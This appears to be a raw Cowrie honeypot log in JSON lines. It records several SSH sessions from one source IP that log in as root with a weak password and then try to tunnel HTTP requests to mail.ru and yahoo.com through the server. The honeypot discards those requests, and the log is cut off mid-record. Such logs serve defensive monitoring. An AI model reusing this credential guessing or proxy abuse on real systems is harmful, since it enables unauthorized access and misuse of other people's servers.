{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.480097Z","src_ip":"77.83.207.83","session":"5eebd1e3277f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20915,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20915","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.624274Z","session":"5eebd1e3277f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.674209Z","src_ip":"77.83.207.83","session":"5eebd1e3277f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":12231,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12231","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.816256Z","session":"5eebd1e3277f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.866260Z","src_ip":"77.83.207.83","session":"5eebd1e3277f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.917297Z","src_ip":"77.83.207.83","session":"5eebd1e3277f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56640,"dst_ip":"1.2.3.4","dst_port":22,"session":"d008c208e2f7","protocol":"ssh","message":"New connection: 77.83.207.83:56640 (1.2.3.4:22) [session: d008c208e2f7]","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.967365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:38.976271Z","src_ip":"77.83.207.83","session":"d008c208e2f7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.018393Z","src_ip":"77.83.207.83","session":"d008c208e2f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.271911Z","src_ip":"77.83.207.83","session":"d008c208e2f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12995,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12995","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.323777Z","session":"d008c208e2f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.374753Z","src_ip":"77.83.207.83","session":"d008c208e2f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":29847,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29847","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.517171Z","session":"d008c208e2f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.568000Z","src_ip":"77.83.207.83","session":"d008c208e2f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":30791,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:30791","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.713192Z","session":"d008c208e2f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.763942Z","src_ip":"77.83.207.83","session":"d008c208e2f7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.815502Z","src_ip":"77.83.207.83","session":"d008c208e2f7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56730,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8d87e614aa7","protocol":"ssh","message":"New connection: 77.83.207.83:56730 (1.2.3.4:22) [session: c8d87e614aa7]","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.865456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.866359Z","src_ip":"77.83.207.83","session":"c8d87e614aa7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:39.917746Z","src_ip":"77.83.207.83","session":"c8d87e614aa7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.173058Z","src_ip":"77.83.207.83","session":"c8d87e614aa7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24373,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24373","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.224983Z","session":"c8d87e614aa7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.276098Z","src_ip":"77.83.207.83","session":"c8d87e614aa7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":11679,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11679","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.421411Z","session":"c8d87e614aa7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.472364Z","src_ip":"77.83.207.83","session":"c8d87e614aa7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":16414,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16414","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.617594Z","session":"c8d87e614aa7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.670319Z","src_ip":"77.83.207.83","session":"c8d87e614aa7"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.721952Z","src_ip":"77.83.207.83","session":"c8d87e614aa7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56809,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8c85a637d87","protocol":"ssh","message":"New connection: 77.83.207.83:56809 (1.2.3.4:22) [session: c8c85a637d87]","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.770277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.780164Z","src_ip":"77.83.207.83","session":"c8c85a637d87"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:40.820062Z","src_ip":"77.83.207.83","session":"c8c85a637d87"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.067255Z","src_ip":"77.83.207.83","session":"c8c85a637d87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25139,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25139","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.118218Z","session":"c8c85a637d87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.168724Z","src_ip":"77.83.207.83","session":"c8c85a637d87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":13861,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13861","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.308186Z","session":"c8c85a637d87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.357765Z","src_ip":"77.83.207.83","session":"c8c85a637d87"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":24749,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24749","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.499869Z","session":"c8c85a637d87"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.549558Z","src_ip":"77.83.207.83","session":"c8c85a637d87"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.600020Z","src_ip":"77.83.207.83","session":"c8c85a637d87"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56901,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5dd38b1786f","protocol":"ssh","message":"New connection: 77.83.207.83:56901 (1.2.3.4:22) [session: a5dd38b1786f]","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.650034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.650993Z","src_ip":"77.83.207.83","session":"a5dd38b1786f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.702252Z","src_ip":"77.83.207.83","session":"a5dd38b1786f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:41.955583Z","src_ip":"77.83.207.83","session":"a5dd38b1786f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16210,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16210","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.007546Z","session":"a5dd38b1786f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.058373Z","src_ip":"77.83.207.83","session":"a5dd38b1786f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":26214,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:26214","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.201218Z","session":"a5dd38b1786f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.252344Z","src_ip":"77.83.207.83","session":"a5dd38b1786f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":19440,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:19440","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.397105Z","session":"a5dd38b1786f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.447899Z","src_ip":"77.83.207.83","session":"a5dd38b1786f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.499732Z","src_ip":"77.83.207.83","session":"a5dd38b1786f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":56987,"dst_ip":"1.2.3.4","dst_port":22,"session":"5457fc214c74","protocol":"ssh","message":"New connection: 77.83.207.83:56987 (1.2.3.4:22) [session: 5457fc214c74]","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.548942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:42.549580Z","src_ip":"77.83.207.83","session":"5457fc214c74"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcf